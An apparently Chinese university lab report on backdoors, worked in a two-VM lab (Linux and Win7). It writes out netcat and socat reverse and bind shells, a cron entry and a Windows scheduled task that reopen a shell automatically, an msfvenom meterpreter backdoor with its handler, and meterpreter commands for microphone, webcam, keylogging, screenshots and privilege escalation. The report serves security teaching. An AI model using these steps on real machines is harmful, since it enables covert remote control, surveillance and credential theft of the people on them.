2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

时间:2021-08-09 08:14:29

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

(1)例举你能想到的一个后门进入到你系统中的可能方式?

在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

win:任务计划启动

linux:通过cron启动

(3)Meterpreter有哪些给你映像深刻的功能?

无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易。

(4)如何发现自己有系统有没有被安装后门?

通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。

实验前先查看win和linux的IP地址便于后面的实验。

Linux:192.168.199.128

Win7:192.168.199.229

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

学习ncat的使用

1.Win获得Linux Shell

  • Win7打开cmd命令行,在ncat解压目录下,输入ncat.exe -l -p 52285228端口进行监听
  • 在Linux终端输入nc 192.168.199.229 5228 -e /bin/sh反弹连接Win75228端口

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践
  • Win7已获得Linux shell,输入ls验证结果

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

    成功

2.Linux获得Win Shell

  • Linux下打开一个终端,输入nc -l -p 52285228端口进行监听

  • 在Win7命令行输入ncat.exe -e cmd.exe 192.168.199.128 5228反弹连接Linux5228端口

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Linux已获得Win7 shell,输入dir验证结果

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

成功

3.使用nc传输信息

  • Win7命令行输入 ncat.exe -l 5228监听5228端口

  • Linux终端输入nc 192.168.199.229 5228反弹连接Win75228端口

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • 建立连接后可互传信息

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

4.使用nc传输文件

  • Win7命令行输入 ncat.exe -l 5228 > 2.txt监听5228端口,并设置收到的文件重定向保存到2.txt

  • Linux终端输入nc 192.168.199.229 5228 < 1.txt反弹连接Win75228端口

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Win7可收到Linux发来的文件。

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

实验内容

任务一:使用netcat获取主机操作Shell,cron启动

1、设定cron

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

  • Win7中打开对端口5228端口的监听。

    ncat.exe -l -p 5228
  • Linux下使用crontab -e指令增加一条定时任务,-e表示编辑
  • 选择3,即编辑器。

    根据 m分钟 h小时 dom日期 mon月 dow周几 command执行的命令的格式添加最后一行33 * * * * /bin/netcat 192.168.199.229 5228 -e /bin/sh

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

保存退出

  • 结果验证:Win7得到Linux Shell

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

任务二:使用socat获取主机操作Shell, 任务计划启动

1、新建任务计划

  • 原理: 在主控机的nc打开对5228端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行ncat.exe -e cmd.exe 192.168.199.128 5228,从而反弹连接到Linux。即Linux得到Win7 shell。

    新建触发器:当锁定任何用户的工作站时

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

新建操作:

启动程序:socat所在路径\socat.exe

添加参数:tcp-listen:5228 exec:cmd.exe,pty,stderr

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

2、锁定计算机,让该任务计划运行。再次唤醒计算机,可以看到刚新建的任务已启动,

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

3、Linux终端输入socat - tcp:192.168.199.229:5228,结果验证:Linux得到了Win7 shell

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Linux终端执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 199.128 LPORT=5228 -f exe > 20165228_backdoor.exe生成后门程序20165228_backdoor.exe

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Win7下执行ncat.exe -l 5228 > 20165228_backdoor.exe监听5228端口,并将收到的文件重定向保存到20165228_backdoor.exe

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Linux终端执行nc 192.168.199.229 5228 < 20165228_backdoor.exe反弹连接Win7并传输文件20165228_backdoor.exe

  • Linux终端执行msfconsole命令,并设置好IP地址和端口号

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • 执行监听

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Win7运行后门程序

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • record_mic录制一段音频

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • webcam_snap使用摄像头拍照

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • keyscan_start开始记录击键,keyscan_dump读取记录

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • screenshot进行截屏

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

  • getuid查看当前用户并执行getsysyem进行提权操作

    2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践

实验中遇到的问题

1、我尝试过用Linux监听端口,Win7反弹连接Linux却提示由于目标计算机积极拒绝,无法连接

解决:尚未解决

2、在最后getsystem获取权限时失败

解决:在尝试一些博客中的方法后,发现好像还是不行,但是了解到了msf使用的是自带的提权方法,只尝试了4个payload,所以大部分都会失败。

实验感想

  • 此次实验的内容让我十分感兴趣,仅仅通过一些简单的指令就可以实现shell权限的获取,也让我明白了信息安全的重要性,特别是在尝试录音、拍照、截屏等操作后,让我认识到信息的泄露太可怕了。这让我更加想要学好网络攻防这门课,深入了解和掌握这些技能。

2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. Redux状态管理方法与实例

    状态管理是目前构建单页应用中不可或缺的一环,也是值得花时间学习的知识点.React官方推荐我们使用Redux来管理我们的React应用,同时也提供了Redux的文档来供我们学习,中文版地址为http: ...

  2. 终端指令操作创建Django项目

    需求:通过Django创建一个用户表和权限表. 用户表包括:用户名,邮箱,密码,管理权限. 权限表包括:普通用户,管理用户,超级用户. 权限表和用户表有一对多的关系,即用户表中的每条数据对应权限表中的 ...

  3. 杂物 git rebase

  4. Celery&comma;Tornado&comma;Supervisor构建和谐的分布式系统

    Celery 分布式的任务队列 与rabbitmq消息队列的区别与联系: rabbitmq 调度的是消息,而Celery调度的是任务. Celery调度任务时,需要传递参数信息,传输载体可以选择rab ...

  5. HTML&amp&semi;CSS基础学习笔记1&period;8-预格式文本

    <pre>标签的主要作用是预格式化文本.被包围在 pre 标签中的文本通常会保留空格和换行符.而文本也会呈现为等宽字体. <pre>标签的一个常见应用就是用来表示计算机的源代码 ...

  6. javascript 数组和字符串的转化

    字符串转化为数组 'abcde' -> ['a', 'b', 'c', 'd', 'e'] 简单一点的方法,__String.prototype.split__可以将字符串转化为数组,分隔符为空 ...

  7. shell变量赋值进阶

    首先,要理解shell中变量的3种赋值情况: unset 例子. unset a 空字符串, null 例子. a='' 非空,即不是unset,并且不是空字符串 例子: a=1 or a=b等 然后 ...

  8. kubernetes进阶(03)kubernetes的namespace

    服务发现与负载均衡Kubernetes在设计之初就充分考虑了针对容器的服务发现与负载均衡机制,提供了Service资源,并通过kube-proxy配合cloud provider来适应不同的应用场景. ...

  9. 采用ADM2483磁隔离器让RS485接口更简单更安全

    采用ADM2483磁隔离器让RS485接口更简单更安全 摘要:本文介绍RS485的特点及应用,指出了普通RS485接口易损坏的问题,针对存在的问题介绍了以ADM2483为核心的磁隔离解决方案. 关键词 ...

  10. Latest China Scam&colon; I&&num;39&semi;ve Been Arrested in the Brothel Crackdown&excl;

    Latest China Scam: I've Been Arrested in the Brothel Crackdown! If the sex industry is fastest to se ...